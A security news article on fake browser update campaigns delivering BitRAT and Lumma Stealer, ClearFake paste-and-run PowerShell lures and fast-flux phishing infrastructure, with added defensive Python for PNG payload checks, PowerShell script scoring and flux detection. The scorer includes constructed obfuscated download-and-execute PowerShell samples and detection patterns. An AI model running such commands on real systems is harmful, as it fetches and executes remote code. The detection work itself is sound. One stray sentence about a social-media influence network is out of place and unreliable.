Fake web browser updates are being used to spread remote access trojans (RATs) and information stealer malware such as BitRAT and Lumma Stealer (aka LummaC2).
"Fake browser updates have been responsible for numerous malware infections, including those of the well-known SocGholish malware," cybersecurity company eSentire said in a recent report. "In April 2024, we observed FakeBat being distributed via similar fake update mechanisms."
The attack chain begins when a potential target visits a booby-trapped website that includes JavaScript code designed to redirect visitors to a fraudulent browser update page ("chatgpt-app[.]cloud").
The redirected web page contains a download link to a ZIP archive ("Update.zip") that's hosted on Discord and downloaded automatically to the victim's device.
It's worth noting that threat actors routinely abuse Discord for malware delivery, with a recent investigation from Bitdefender uncovering more than 50,000 malicious links propagating malware, phishing campaigns, and spam over the last six months.
Inside the ZIP archive is another JavaScript file ("Update.js"), which launches PowerShell scripts responsible for retrieving additional payloads, including BitRAT and Lumma Stealer, from a remote server in the form of PNG image files.
Also retrieved in this way are PowerShell scripts that establish persistence and a .NET-based loader that's primarily used to launch the final-stage malware. eSentire assessed that the loader is likely advertised as a "malware delivery service," given that the same loader is used to install both BitRAT and Lumma Stealer.
BitRAT is a feature-rich RAT that enables attackers to harvest data, mine cryptocurrency, download additional malware, and remotely control infected systems. Lumma Stealer, a commodity stealer malware offered for $250 to $1,000 per month since August 2022, advertises the ability to capture information from web browsers, crypto wallets, and other sensitive sources.
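Payloads fetched "in the form of PNG image files" only need to fool a content-type or extension check, not a real decoder. A quick structural check catches the common tricks (a PE or script appended after the IEND chunk, or bytes stuffed into chunks without fixing the CRC). The following is an added example, not eSentire's tooling and not a sample from the campaign: it builds a tiny constructed PNG, then walks the chunk table of any blob and reports trailing data, CRC mismatches and a missing IEND. The file names and payload bytes in the usage are made up.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def build_png_chunk(chunk_type: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + chunk_type + data + struct.pack(">I", crc)


def minimal_png() -> bytes:
    """Constructed 1x1 greyscale PNG used as clean reference input (not a real sample)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # width, height, depth, colour type 0
    idat = zlib.compress(b"\x00\x00")                     # filter byte + one pixel
    return (PNG_SIGNATURE
            + build_png_chunk(b"IHDR", ihdr)
            + build_png_chunk(b"IDAT", idat)
            + build_png_chunk(b"IEND", b""))


def inspect_png(blob: bytes) -> dict:
    """Walk the chunk structure and report anything a genuine image would not have.

    valid_signature - starts with the PNG magic bytes
    chunks          - chunk types seen, in order, up to IEND
    crc_errors      - chunk types whose stored CRC does not match their content
    trailing_bytes  - bytes after IEND (a real image has none)
    suspicious      - True when any of the above indicates non-image content
    """
    report = {"valid_signature": False, "chunks": [], "crc_errors": [],
              "trailing_bytes": 0, "suspicious": False}
    if not blob.startswith(PNG_SIGNATURE):
        report["suspicious"] = True
        return report
    report["valid_signature"] = True

    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        data_start = pos + 8
        data_end = data_start + length
        if data_end + 4 > len(blob):
            # Chunk claims more data than exists: treat the remainder as junk.
            report["trailing_bytes"] = len(blob) - pos
            report["suspicious"] = True
            return report
        data = blob[data_start:data_end]
        stored_crc = struct.unpack(">I", blob[data_end:data_end + 4])[0]
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != stored_crc:
            report["crc_errors"].append(ctype.decode("ascii", "replace"))
        report["chunks"].append(ctype.decode("ascii", "replace"))
        pos = data_end + 4
        if ctype == b"IEND":
            break

    report["trailing_bytes"] = len(blob) - pos
    if report["trailing_bytes"] or report["crc_errors"] or "IEND" not in report["chunks"]:
        report["suspicious"] = True
    return report


if __name__ == "__main__":
    # Constructed "payload": a clean PNG with a fake executable header glued on the end.
    stuffed = minimal_png() + b"MZ" + b"\x00" * 64
    print(inspect_png(minimal_png()))
    print(inspect_png(stuffed))
```

The check is deliberately cheap enough to run on a proxy or sandbox egress; it does not decode pixels, so a payload hidden inside a valid IDAT stream (steganography proper) will still pass, and a sandbox detonation or YARA rule on the decompressed data is the next layer.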
"The fake browser update lure has become common amongst attackers as a means of entry to a device or network," the firm said, adding it "displays the operator's ability to leverage trusted names to maximize reach and impact."
While such attacks typically leverage drive-by downloads and malvertising techniques, ReliaQuest, in a report published last week, said it discovered a new variant of the ClearFake campaign that tricks users into copying, pasting, and manually executing malicious PowerShell code under the pretext of a browser update.
Specifically, the malicious website claims that "something went wrong while displaying this webpage" and instructs the site visitor to install a root certificate to address the issue by following a series of steps, which involves copying obfuscated PowerShell code and running it in a PowerShell terminal.
"Upon execution, the PowerShell code performs multiple functions, including clearing the DNS cache, displaying a message box, downloading further PowerShell code, and installing 'LummaC2' malware," the firm said.
According to data shared by the cybersecurity company, Lumma Stealer emerged as one of the most prevalent information stealers in 2023, alongside RedLine and Raccoon.
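Because the victim pastes and runs the script themselves, there is no dropped file to scan; the artefact defenders get is the script block (PowerShell script block logging, Event ID 4104) or the clipboard contents. The combination ReliaQuest describes (DNS cache flush, a message box, a download, then execution of the downloaded code) is distinctive enough to score. What follows is an added example, not ReliaQuest's detection content: it normalises the backtick and string-concatenation obfuscation seen in such lures, unwraps `-EncodedCommand` layers, and scores the indicator set. The indicator patterns, thresholds and both sample scripts are constructed for illustration.

```python
import base64
import re

# Indicator patterns, matched case-insensitively against a normalised script layer.
# Constructed for this example; tune them against your own script block logs.
INDICATORS = {
    "dns_cache_clear": r"clear-dnsclientcache|ipconfig\s+/flushdns",
    "message_box":     r"messagebox\]::show|\[windows\.forms\.messagebox\]",
    "web_download":    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|net\.webclient",
    "dynamic_exec":    r"invoke-expression|\biex\b",
    "base64_layer":    r"frombase64string|-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}",
    "hidden_window":   r"-w(indowstyle)?\s+hidden",
}
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)


def normalise(script: str) -> str:
    """Undo cheap obfuscation: I`E`X -> IEX, 'Down'+'loadString' -> 'DownloadString'."""
    s = script.replace("`", "")
    s = re.sub(r"""["']\s*\+\s*["']""", "", s)
    return re.sub(r"\s+", " ", s)


def decode_layers(script: str, max_depth: int = 3) -> list:
    """Return the script plus every -EncodedCommand (UTF-16LE base64) layer inside it."""
    layers, frontier = [script], [script]
    for _ in range(max_depth):
        next_frontier = []
        for text in frontier:
            for m in ENCODED_ARG.finditer(text):
                try:
                    decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
                except (ValueError, UnicodeDecodeError):
                    continue
                layers.append(decoded)
                next_frontier.append(decoded)
        frontier = next_frontier
        if not frontier:
            break
    return layers


def score_script(script: str) -> dict:
    """Score one pasted script; 'download then execute' is the core, the rest is dressing."""
    hits = set()
    layers = decode_layers(script)
    for layer in layers:
        text = normalise(layer)
        for name, pattern in INDICATORS.items():
            if re.search(pattern, text, re.IGNORECASE):
                hits.add(name)
    core = {"web_download", "dynamic_exec"} <= hits
    if core and len(hits) >= 3:
        verdict = "likely_clearfake_style"
    elif hits:
        verdict = "review"
    else:
        verdict = "benign"
    return {"indicators": sorted(hits), "layers": len(layers), "verdict": verdict}


# Constructed sample 1: the copy-and-paste "certificate fix" shape, lightly obfuscated.
SAMPLE_PASTED = r"""
ipconfig /flushdns
[System.Windows.Forms.MessageBox]::Show('Certificate installed, please wait...')
$c = New-Object Net.WebClient
I`E`X $c.('Down'+'loadString')('http://example.invalid/stage2.txt')
"""

# Constructed sample 2: the same download-and-run hidden behind an encoded command.
_INNER = "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_ENCODED = "powershell -w hidden -enc " + base64.b64encode(_INNER.encode("utf-16-le")).decode("ascii")

if __name__ == "__main__":
    for sample in (SAMPLE_PASTED, SAMPLE_ENCODED, "Get-ChildItem C:\\Users | Sort-Object LastWriteTime"):
        print(score_script(sample))
```

Run this over 4104 events rather than process command lines: the lure tells the user to paste into an interactive PowerShell window, so the parent process is a normal console and the command line carries nothing of interest.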
"The number of LummaC2-obtained logs listed for sale increased by 110% from Q3 to Q4 2023," it added. "LummaC2's rising popularity among adversaries is likely due to its high success rate, which refers to its effectiveness in successfully infiltrating systems and exfiltrating sensitive data without detection."
The development comes as the AhnLab Security Intelligence Center (ASEC) disclosed details of a new campaign that employs webhards (short for web hard drive) as a conduit to distribute malicious installers for adult games and cracked versions of Microsoft Office and ultimately deploy a variety of malware such as Orcus RAT, XMRig miner, 3proxy, and XWorm.
Similar attack chains using websites advertising unlicensed software have led to the deployment of malware loaders like PrivateLoader and TaskLoader, which are both provided as a pay-per-install (PPI) service for other cybercriminals to distribute their own payloads.
It also follows recent findings from Silent Push concerning CryptoChameleon's "almost exclusive use" of DNSPod[.]com nameservers to power its phishing kit infrastructure. DNSPod, part of the Chinese company Tencent, has a history of providing services to malicious bulletproof hosting providers.
"CryptoChameleon uses DNSPod nameservers to engage in fast flux evasion techniques that allow threat actors to quickly cycle through large amounts of IPs linked to a single domain name," the business stated.
"Fast flux allows CryptoChameleon infrastructure to evade traditional countermeasures, and significantly reduces the operational value of legacy point-in-time IOCs."
employing at least seven principal social media identities and a CIB network of more than 250 users.
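The practical consequence of the fast flux point above is that an IP blocklist captured today is stale tomorrow, while the domain and the nameserver stay constant. Fast flux is also observable from the resolver side: the same name keeps answering with fresh addresses at short TTLs. The following is an added example, not Silent Push's methodology, that turns repeated resolution snapshots into the features analysts usually look at (distinct addresses, address churn between lookups, prefix spread, TTL) and applies a simple threshold. All domains, addresses and thresholds are constructed; real tuning needs ASN data and an allow-list for CDNs, which legitimately rotate addresses too.

```python
import ipaddress
from statistics import median

# Constructed DNS resolution snapshots: (seconds since start, domain, A records, TTL).
# Made-up values for illustration, not observations of any real infrastructure.
SNAPSHOTS = [
    (0,   "login-example.invalid", ["203.0.113.10", "198.51.100.7", "192.0.2.44"], 60),
    (300, "login-example.invalid", ["203.0.113.88", "198.51.100.200", "192.0.2.9"], 60),
    (600, "login-example.invalid", ["203.0.113.5", "198.51.100.31", "192.0.2.150"], 60),
    (900, "login-example.invalid", ["203.0.113.201", "198.51.100.77", "192.0.2.3"], 60),
    (0,   "static-site.invalid", ["203.0.113.50", "203.0.113.51"], 3600),
    (300, "static-site.invalid", ["203.0.113.50", "203.0.113.51"], 3600),
    (600, "static-site.invalid", ["203.0.113.51", "203.0.113.50"], 3600),
    (900, "static-site.invalid", ["203.0.113.50", "203.0.113.51"], 3600),
]


def flux_features(snapshots, domain):
    """Summarise how one domain's answers behave across repeated lookups."""
    rows = sorted((t, ips, ttl) for t, d, ips, ttl in snapshots if d == domain)
    all_ips, nets, ttls, churn = set(), set(), [], []
    prev = None
    for _, ips, ttl in rows:
        cur = set(ips)
        all_ips |= cur
        # /24 is a crude stand-in for ASN diversity when no ASN feed is available.
        nets |= {ipaddress.ip_network(ip + "/24", strict=False) for ip in cur}
        ttls.append(ttl)
        if prev is not None:
            churn.append(len(cur - prev) / len(cur))  # share of answers new since last lookup
        prev = cur
    return {
        "lookups": len(rows),
        "distinct_ips": len(all_ips),
        "distinct_nets": len(nets),
        "median_ttl": median(ttls) if ttls else None,
        "mean_churn": sum(churn) / len(churn) if churn else 0.0,
    }


def is_fast_flux(features, min_ips=8, max_ttl=300, min_churn=0.5):
    """Threshold rule: many addresses, short TTL, and answers that keep changing."""
    return (features["distinct_ips"] >= min_ips
            and features["median_ttl"] is not None
            and features["median_ttl"] <= max_ttl
            and features["mean_churn"] >= min_churn)


if __name__ == "__main__":
    for name in ("login-example.invalid", "static-site.invalid"):
        f = flux_features(SNAPSHOTS, name)
        print(name, f, "FAST FLUX" if is_fast_flux(f) else "stable")
```

The churn feature is the one that separates flux from ordinary round-robin: a load balancer returns the same pool in a different order, a flux network returns addresses you have not seen before. Because the domain and its nameservers are the stable part, they are the indicators worth keeping, which is exactly the point Silent Push makes about point-in-time IP IOCs.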